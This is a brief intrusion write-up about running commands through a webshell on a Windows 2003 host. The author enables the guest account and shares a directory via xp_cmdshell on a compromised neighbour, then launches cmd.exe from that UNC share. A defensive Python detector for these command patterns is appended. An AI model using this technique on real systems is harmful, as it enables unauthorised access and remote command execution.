Recently, during an intrusion against a Windows 2003 host, I found that by default the system's own cmd.exe could not be used to execute system commands. Uploading my own cmd.exe through the webshell failed because the file was too large, so instead I made cmd.exe available through a file share on an adjacent machine. The specific process was as follows.

We had already obtained administrator privileges on the adjacent machine 192.168.1.1. Using SQL Server's xp_cmdshell, the following commands were run on it:

net user guest /active:yes    (enable the guest account so the share can be accessed anonymously)
net share web=d:\web          (share the d:\web directory under the name "web")

Then, in the webshell on the target machine, the cmd path was entered as: \\192.168.1.1\web\cmd.exe

Finally, as shown in the figure, with the shell path pointed at this cmd.exe instead of the one under c:\, normal system commands could be executed.
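As an added defensive example (not part of the original post), the Python checker below flags the command-line patterns this technique leaves behind in process-creation records: the guest account being enabled, an ad-hoc share being created, and an executable being launched from a UNC path, with an extra tag when the parent is a database or web-server process. The sample events and the parent image names are constructed assumptions.

```python
import re

# Constructed sample process-creation events (parent image, command line).
SAMPLE_EVENTS = [
    ("sqlservr.exe", "net user guest /active:yes"),
    ("sqlservr.exe", "net share web=d:\\web"),
    ("w3wp.exe", "\\\\192.168.1.1\\web\\cmd.exe /c dir c:\\"),
    ("explorer.exe", "notepad.exe report.txt"),
]

# Each rule names one indicator and the regex that recognises it.
RULES = [
    ("guest_account_enabled",
     re.compile(r"\bnet1?\s+user\s+guest\s+/active:yes", re.I)),
    ("share_created",
     re.compile(r"\bnet1?\s+share\s+\S+=", re.I)),
    ("unc_executable_launch",
     re.compile(r"^\\\\[^\\]+\\[^\\]+\\[^\\]+\.exe", re.I)),
]

# Parents that should rarely spawn shell administration commands (assumed names).
SERVER_PARENTS = {"sqlservr.exe", "w3wp.exe"}


def classify(parent, cmdline):
    """Return the indicator tags that apply to one event, empty if benign."""
    tags = [name for name, rx in RULES if rx.search(cmdline)]
    if tags and parent.lower() in SERVER_PARENTS:
        tags.append("spawned_by_server_process")
    return tags


def scan(events):
    """Return a finding for every event that matched at least one rule."""
    findings = []
    for parent, cmdline in events:
        tags = classify(parent, cmdline)
        if tags:
            findings.append({"parent": parent, "cmdline": cmdline, "tags": tags})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["parent"], "|", finding["cmdline"], "|", ", ".join(finding["tags"]))
```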